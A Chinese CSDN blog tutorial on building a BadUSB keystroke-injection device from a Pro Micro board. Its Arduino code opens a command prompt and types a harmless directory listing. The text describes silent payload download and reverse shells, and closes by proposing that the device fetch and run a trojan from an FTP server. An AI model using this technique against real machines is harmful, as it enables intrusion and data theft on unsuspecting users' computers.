群里一些朋友比较喜欢BadUSB单苦于不知道从哪里开始做,于是我这个做群主的就自己动手买了个ProMicro的板子(花费我16元),结合Arduino和CMD模拟一下建议的过程
关于BadUSB
BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。HID设备通常指的就是键盘鼠标等与人交互的设备,用户插入BadUSB,就会自动执行预置在固件中的恶意代码。
Bad-Usb插入后,会模拟键盘鼠标对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载其他代码并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。
关于ProMicro
ProMicro使用的处理器核心ATmega32U4(兼容Arduino Leonardo)可用于模拟HID设备,可以配合其它传感器模块做键鼠输入。
它长这样:
步骤
一.打开Arduino配置
Arduino的COM端口配置,连接完后我们就要写代码了。
二.Arduino写代码
#include<Keyboard.h> //包含键盘库头文件
void setup(){ //初始化
Keyboard.begin();//开始键盘通信
delay(1000);//延时1000毫秒,
Keyboard.press(KEY_LEFT_GUI);//按下win键
Keyboard.press('r');//按下r键 打开CMD
delay(500);// 延时500毫秒
Keyboard.release(KEY_LEFT_GUI);//松掉win键
Keyboard.release('r');//松掉r键
delay(500); //8.延时500毫秒
Keyboard.println("cmd ");//输入cmd
Keyboard.press(KEY_RETURN); //按下回车键
Keyboard.release(KEY_RETURN); //释放回车键
delay(500);//12.延迟
Keyboard.println("dir");
Keyboard.press(KEY_RIGHT_SHIFT); //按下shift
Keyboard.release(KEY_RIGHT_SHIFT);
Keyboard.println(" /w/s "); //一个酷炫的代码雨
Keyboard.press(KEY_RIGHT_SHIFT); //按下shift
Keyboard.release(KEY_RIGHT_SHIFT);
delay(2000);//延迟
Keyboard.press(KEY_RETURN);//按下回车键
Keyboard.release(KEY_RETURN);//释放enter键
delay(3000); //延迟
Keyboard.end();//结束键盘通讯
}
void loop()//循环,这里的代码
{
//循环体如果想要一直运行就吧代码写这
}
问:为什么不把dir /w/s写成一行,还要拆分?答:英文要考虑到别人电脑开了输入法。
代码理解起来比较简单,模拟键盘输入打开CMD并隐藏窗口,并查看了一遍自己电脑的东西。 接下来就要编译了。
这样就上传好了
我们可以看到,自己就运行了。
三.代码运用
我们完成后只是简单的功能还是不够,我们可以用FTP搭建一个文件服务器,放一个木马文件,我们插入后去下载木马然后打开,就完成了一次攻击,好了这期教程说完了,大家下次再见。
————————————————
版权声明:本文为CSDN博主「SouthWind-南风」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_41181921/article/details/106892304
| 
